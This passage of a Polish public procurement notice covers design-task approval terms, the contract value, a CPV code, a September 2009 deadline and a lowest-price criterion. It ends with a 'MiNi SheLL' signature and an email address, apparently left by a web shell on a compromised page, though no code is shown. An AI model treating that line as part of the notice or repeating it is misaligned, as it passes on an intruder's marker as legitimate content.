i przekazaniu całości dokumentacji.
Należy przewidzieć czas niezbędny na sprawdzenie projektów oraz ich zatwierdzenie - min. 1 miesiąc (przed upływem terminu wykonania danego zadania). 
W przypadku stwierdzenia błędów lub usterek w projektach będą one odsyłane w celu dokonania poprawy. Czas przewidziany na zatwierdzenie będzie liczył się od momentu ich ponownego złożenia z naniesionymi poprawkami.Wartość Zadania IV: 6.440,00 zł netto.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com